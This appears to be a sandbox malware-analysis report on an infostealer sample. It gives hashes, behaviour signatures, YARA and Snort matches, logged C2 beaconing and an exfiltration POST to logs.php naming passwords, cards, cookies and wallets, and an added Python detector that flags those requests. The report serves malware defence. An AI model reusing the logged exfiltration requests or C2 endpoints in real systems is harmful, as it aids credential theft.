
Windows Analysis Report
5VXh2VBmA0

Overview

General Information

Sample Name: 5VXh2VBmA0 (renamed file extension from none to exe)
Analysis ID: 790106
MD5: 7a483865f3f1999ab24ed75f710649ad
SHA1: b149c60bbc7f1781e76079210da29a55d0b137a3
SHA256: 536ac35ca8f6e6ddf85737ad4cabd5631542613ffec3c9b03947aaa2cdc0dcaf

Detection

Predator
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Predator
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
May check the online IP address of the machine
Yara detected Generic Downloader
Machine Learning detection for dropped file
Moves itself to temp directory
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • 5VXh2VBmA0.exe (PID: 6016, cmdline: C:\Users\user\Desktop\5VXh2VBmA0.exe, MD5: 7A483865F3F1999AB24ED75F710649AD)
    • Zip.exe (PID: 3920, cmdline: "C:\Users\user\AppData\Local\Temp\Zip.exe", MD5: AF07E88EC22CC90CEBFDA29517F101B9)
  • update_232309.exe (PID: 2108, cmdline: "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start, MD5: 7A483865F3F1999AB24ED75F710649AD)
  • update_232309.exe (PID: 4552, cmdline: "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start, MD5: 7A483865F3F1999AB24ED75F710649AD)
  • cleanup

Both update_232309.exe processes carry the MD5 of the submitted sample, so they are the sample re-launched from %TEMP% under a new name with the "/ start" argument (cf. "Moves itself to temp directory" in the signature list), whereas Zip.exe (MD5 AF07E88EC22CC90CEBFDA29517F101B9) is a separately dropped binary.

Malware Configuration

No configs have been found
Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
5VXh2VBmA0.exe | JoeSecurity_Predator | Yara detected Predator | Joe Security |
5VXh2VBmA0.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
5VXh2VBmA0.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5VXh2VBmA0.exe | INDICATOR_SUSPICIOUS_EXE_References_VPN | Detects executables referencing many VPN software clients. Observed in infostealers | ditekSHen | see below
  • 0x7d546:$s1: \Vpn\NordVPN
  • 0x80cb0:$s2: \VPN\OpenVPN
  • 0x80d1e:$s3: \VPN\ProtonVPN
5VXh2VBmA0.exe | Windows_Trojan_Lucifer_ce9d4cc8 | unknown | unknown | see below
  • 0x651cd:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Zip.exe | Windows_Trojan_Lucifer_ce9d4cc8 | unknown | unknown | see below
  • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Lucifer_ce9d4cc8 | unknown | unknown | see below
  • 0xf1ed:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Predator | Yara detected Predator | Joe Security |
00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_Lucifer_ce9d4cc8 | unknown | unknown | see below
  • 0x64dcd:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(truncated; the full section has 8 entries)

Unpacked PEs

Source | Rule | Description | Author | Strings
10.0.Zip.exe.176e4530000.0.unpack | Windows_Trojan_Lucifer_ce9d4cc8 | unknown | unknown | see below
  • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
0.2.5VXh2VBmA0.exe.2cb6f08.0.raw.unpack | Windows_Trojan_Lucifer_ce9d4cc8 | unknown | unknown | see below
  • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack | JoeSecurity_Predator | Yara detected Predator | Joe Security |
0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(truncated; the full section has 22 entries)

Sigma Overview

No Sigma rule has matched
Snort IDS Alerts

All five alerts are SID 2022818 (ET TROJAN Generic gate .php GET with minimal headers, see the Networking section) on the same client-to-C2 flow.

Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Classtype
01/23/23-21:25:29.484357 | 192.168.2.3 | 49708 | 92.249.45.113 | 80 | TCP | 2022818 | A Network Trojan was detected
01/23/23-21:25:23.289815 | 192.168.2.3 | 49707 | 92.249.45.113 | 80 | TCP | 2022818 | A Network Trojan was detected
01/23/23-21:25:39.311255 | 192.168.2.3 | 49712 | 92.249.45.113 | 80 | TCP | 2022818 | A Network Trojan was detected
01/23/23-21:25:47.864338 | 192.168.2.3 | 49715 | 92.249.45.113 | 80 | TCP | 2022818 | A Network Trojan was detected
01/23/23-21:25:59.271301 | 192.168.2.3 | 49718 | 92.249.45.113 | 80 | TCP | 2022818 | A Network Trojan was detected


                    AV Detection

Source: 5VXh2VBmA0.exe; ReversingLabs: Detection: 80%
Source: 5VXh2VBmA0.exe; Virustotal: Detection: 60%
Source: 5VXh2VBmA0.exe; Avira: detected
Source: Yara match; File source: 5VXh2VBmA0.exe, type: SAMPLE
Source: Yara match; File source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Zip.exe; Avira: detection malicious, Label: TR/Redcap.vxffz
Source: C:\Users\user\AppData\Local\Temp\Zip.exe; ReversingLabs: Detection: 76%
Source: 5VXh2VBmA0.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Zip.exe; Joe Sandbox ML: detected
Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack; Avira: Label: TR/Redcap.vxffz
Source: 5VXh2VBmA0.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5VXh2VBmA0.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb; source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb; source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9B9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rms.pdb; source: 5VXh2VBmA0.exe, 00000000.00000002.547892509.000000001E657000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \gom_v_4.0\Zip\Zip\obj\Debug\Zip.pdb; source: 5VXh2VBmA0.exe, Zip.exe.0.dr
Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb; source: 5VXh2VBmA0.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr
Source: Binary string: \gom_v_4.0\update_windows10\update_windows10\obj\Debug\update_windows10.pdb; source: 5VXh2VBmA0.exe
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe; Code function: 4x nop then dec eax; 0_2_00007FFBAD3AA1A9
Source: C:\Users\user\AppData\Local\Temp\Zip.exe; Code function: 4x nop then dec eax; 10_2_00007FFBAD3A9C5F
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe; Code function: 4x nop then dec eax; 11_2_00007FFBAD3B6EEE
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe; Code function: 4x nop then dec eax; 12_2_00007FFBAD376F2E

                    Networking

Source: Traffic; Snort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49707 -> 92.249.45.113:80
Source: Traffic; Snort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49708 -> 92.249.45.113:80
Source: Traffic; Snort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49712 -> 92.249.45.113:80
Source: Traffic; Snort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49715 -> 92.249.45.113:80
Source: Traffic; Snort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49718 -> 92.249.45.113:80
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe; DNS query: name: ip-api.com
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe; DNS query: name: ip-api.com
Source: C:\Users\user\Desktop\5VXh2VBmA0.exe; DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\Zip.exe; DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe; DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe; DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\Zip.exe; DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe; DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\update_232309.exe; DNS query: name: ip-api.com
Source: Yara match; File source: 5VXh2VBmA0.exe, type: SAMPLE
Source: Yara match; File source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View; ASN Name: AS-HOSTINGERLT
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: POST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49d | Host: panel.cheater-zone.com | Content-Length: 791547 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic; HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com (this identical polling request appears 38 more times in the original report)
Source: Joe Sandbox View; IP Address: 208.95.112.1
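The request lines above (gate.php / task.php beaconing keyed on a hwid, a multipart POST to logs.php, and the ip-api.com geolocation lookup, all without a User-Agent header) are what the Snort alert and the "HTTP GET or POST without a user agent" signature fire on. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it parses a handful of constructed request heads modelled on the ones logged in this report (plus one benign control request with a User-Agent) and tags them with simple heuristics. The function and tag names are my own, and the gate.php check is only an approximation of what SID 2022818 looks for, not the Emerging Threats rule itself.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample request heads, modelled on the request lines logged in
# the report above (not captured traffic). The last one is a benign control:
# same path style, but sent with a User-Agent.
SAMPLE_REQUESTS = [
    "GET /json/ HTTP/1.1\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1\r\nHost: panel.cheater-zone.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /task.php?hwid=CH65FCCAB88D HTTP/1.1\r\nHost: panel.cheater-zone.com\r\n\r\n",
    "POST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49d\r\n"
    "Host: panel.cheater-zone.com\r\nContent-Length: 791547\r\nExpect: 100-continue\r\n\r\n",
    "GET /gate.php?id=1 HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into method, path, query dict and a
    lower-cased header dict. Any body after the blank line is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"method": method, "path": parts.path, "query": query, "headers": headers}


def classify(req):
    """Return the heuristic tags (assumed names) that fire on one parsed request."""
    tags = []
    path = req["path"].lower()
    hdrs = req["headers"]
    ctype = hdrs.get("content-type", "")
    no_ua = "user-agent" not in hdrs
    # Approximation of the Snort alert: a GET for gate.php with minimal
    # headers (assumption: the ET rule's exact content matches are not reproduced).
    if req["method"] == "GET" and path.endswith("/gate.php") and no_ua:
        tags.append("gate_php_no_ua")
    # Mirrors the report's "HTTP GET or POST without a user agent" signature.
    if no_ua:
        tags.append("no_user_agent")
    # Multipart upload to logs.php: the stolen-data exfiltration seen above.
    if req["method"] == "POST" and path.endswith("/logs.php") and ctype.startswith("multipart/form-data"):
        tags.append("logs_php_upload")
    # Mirrors "May check the online IP address of the machine".
    if hdrs.get("host") == "ip-api.com" and path == "/json/":
        tags.append("ip_geolocation_lookup")
    # Any request carrying a hwid parameter is treated as a C2 beacon.
    if "hwid" in req["query"]:
        tags.append("hwid_beacon")
    return tags


def scan(requests):
    """Classify every request and collect alerts plus the C2 hosts and hwid
    values observed in beaconing requests (both useful as IoCs)."""
    alerts, c2_hosts, hwids = [], set(), set()
    for raw in requests:
        req = parse_request(raw)
        tags = classify(req)
        if not tags:
            continue
        alerts.append((req["method"], req["headers"].get("host"), req["path"], tags))
        if "hwid_beacon" in tags:
            c2_hosts.add(req["headers"].get("host"))
            hwids.add(req["query"]["hwid"])
    return {"alerts": alerts, "c2_hosts": c2_hosts, "hwids": hwids}


if __name__ == "__main__":
    result = scan(SAMPLE_REQUESTS)
    for method, host, path, tags in result["alerts"]:
        print(f"{method} {host}{path} -> {', '.join(tags)}")
    print("C2 hosts:", sorted(result["c2_hosts"]))
    print("HWIDs:", sorted(result["hwids"]))
```

Running it flags the four malicious requests and leaves the browser-style control untouched; the benign request shares the gate.php path but carries a User-Agent, which is exactly why the "minimal headers" condition matters for keeping false positives down on a generic path name like gate.php.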
Source: update_232309.exe, 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr; String found in binary or memory: http://expression/newtonsoft.json.dll
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://fontfabrik.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000003145000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61F0000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61B9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: 5VXh2VBmA0.exe, Zip.exe.0.dr; String found in binary or memory: http://ip-api.com/json/
Source: Zip.exe, 0000000A.00000002.375551818.00000176E61FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com8
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D68000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.comx
Source: Newtonsoft.Json.dll.0.dr; String found in binary or memory: http://james.newtonking.com/projects/json
Source: 5VXh2VBmA0.exe; String found in binary or memory: http://panel.cheater-zone.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://panel.cheater-zone.com/gate.php?hwid=CH65FCCAB88D
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFil
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://panel.cheater-zone.com/task.php?hwid=CH65FCCAB88D
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://panel.cheater-zone.com8
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://panel.cheater-zone.comx
Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E6121000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D21000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fonts.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sakkal.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.tiro.com
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.typography.netD
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317F000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 5VXh2VBmA0.exe, info.txt.0.dr; String found in binary or memory: https://gomorrah.pw
